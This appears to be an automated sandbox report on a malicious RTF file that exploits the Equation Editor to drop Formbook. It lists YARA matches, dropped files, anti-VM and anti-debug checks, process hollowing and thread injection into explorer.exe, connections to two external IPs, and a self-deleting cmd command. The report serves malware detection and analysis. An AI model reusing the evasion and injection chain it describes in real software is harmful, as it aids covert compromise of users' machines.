          Source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: pp[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winRTF@12/8@3/3
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$wBU8MyzT.rtfJump to behavior
          Source: C:\Users\Public\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\DGxsVlh
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE169.tmpJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: fqwBU8MyzT.rtfReversingLabs: Detection: 48%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: RegSvcs.exe, 00000006.00000002.2151498598.00000000003E0000.00000040.00000001.sdmp
          Source: Binary string: RegSvcs.pdb source: wlanext.exe, 00000009.00000002.2401023696.00000000005D6000.00000004.00000020.sdmp
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00CB48FC push edx; retf 4_2_00CB48FD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00417A32 push es; iretd 6_2_00417A3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041CEB5 push eax; ret 6_2_0041CF08
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041CF6C push eax; ret 6_2_0041CF72
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041CF02 push eax; ret 6_2_0041CF08
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041CF0B push eax; ret 6_2_0041CF72
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008CDFA1 push ecx; ret 6_2_008CDFB4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F7DFA1 push ecx; ret 9_2_01F7DFB4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00097A32 push es; iretd 9_2_00097A3B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0009CEB5 push eax; ret 9_2_0009CF08
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0009CF0B push eax; ret 9_2_0009CF72
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0009CF02 push eax; ret 9_2_0009CF08
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0009CF6C push eax; ret 9_2_0009CF72
          Source: initial sampleStatic PE information: section name: .text entropy: 7.62841280925
          Source: initial sampleStatic PE information: section name: .text entropy: 7.62841280925
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x86 0x6E 0xE7
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2105488822.00000000021A5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2492, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000000089B5E second address: 0000000000089B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00409A90 rdtsc 6_2_00409A90
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2296Thread sleep time: -420000s >= -30000sJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2296Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 1692Thread sleep time: -50254s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 2364Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 2880Thread sleep time: -46000s >= -30000sJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2768Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 824Thread sleep time: -50000s >= -30000sJump to behavior
          Source: explorer.exe, 00000007.00000002.2400913887.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.2114083954.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000007.00000000.2114119554.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II|update users set password = @password where user_id = @user_id
          Source: explorer.exe, 00000007.00000000.2114083954.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000007.00000000.2114083954.0000000004234000.00000004.00000001.sdmpBinary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
          Source: explorer.exe, 00000007.00000000.2114003133.00000000041DB000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
          Source: explorer.exe, 00000007.00000000.2107221018.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00409A90 rdtsc 6_2_00409A90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0040ACD0 LdrLoadDll,6_2_0040ACD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008D26F8 mov eax, dword ptr fs:[00000030h]6_2_008D26F8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F826F8 mov eax, dword ptr fs:[00000030h]9_2_01F826F8
          Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 146.148.194.209 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 162.0.232.118 80Jump to behavior
          Allocates memory in foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 1388Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 1388Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 1388Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: B30000Jump to behavior
          Writes to foreign memory regionsShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
          Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
          Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'Jump to behavior
          Source: explorer.exe, 00000007.00000002.2401194206.00000000006F0000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.2401088908.0000000000B50000.00000002.00000001.sdmpBinary or memory string: Program Manager
